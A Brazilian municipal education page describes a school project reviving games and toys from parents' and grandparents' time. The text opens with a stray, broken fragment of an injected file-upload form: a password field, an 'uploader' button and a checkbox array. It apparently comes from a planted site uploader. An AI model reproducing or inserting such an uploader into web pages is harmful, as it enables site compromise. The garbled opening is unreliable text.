POST>PASSWORD: CHECKBOX NAME="F[]" VALUE=" "_upl" value="Upload" name="uploader" id="uploader" VIAGEM AO PASSADO DAS BRINCADEIRAS INFANTIS – Secretaria de Educação de Brusque
a
[vc_empty_space height="10px"]
a
Weather:
city not found
HomeCULTURAVIAGEM AO PASSADO DAS BRINCADEIRAS INFANTIS

VIAGEM AO PASSADO DAS BRINCADEIRAS INFANTIS

UM RESGATE DAS BRINCADEIRAS DO TEMPO DE NOSSOS PAIS E AVÓS

Vemos cada vez mais crianças com celulares e tablets nas mãos ou sentadas em frente a computadores brincando com joguinhos virtuais que muitas vezes não são educativos e principalmente não desenvolvem na criança as habilidades necessárias ao seu desenvolvimento. Pensando nisso, a Professora de Projetos Marinilza O. S. da Silva da Escola de Educação Fundamental Edith Gama Ramos, idealizou um projeto intitulado “Viagem ao passado – Brincadeiras infantis”, que é nada menos que um resgate das brincadeiras e brinquedos infantis do tempo de nossos pais e avós.

Como escola, temos o papel de resgatar a infância de nossas crianças, não as afastando da tecnologia que permeia nosso mundo globalizado, mas, mostrando para o nosso educando que existem outras alternativas de se divertir e que não precisa ser simplesmente na frente de um computador ou similares.

O projeto vai muito além, envolvendo todos os alunos da escola e também suas famílias, tendo objetivos que buscam promover o enriquecimento cultural, trabalhar o conceito e a importância das tradições, aprimorar a coordenação motora fina por meio das confecções de trabalhos manuais, desenvolver a consciência corporal e a consciência ecológica, valorizando o reaproveitamento de materiais na construção dos brinquedos.

Marcadores
Sem comentários

Deixe um comentário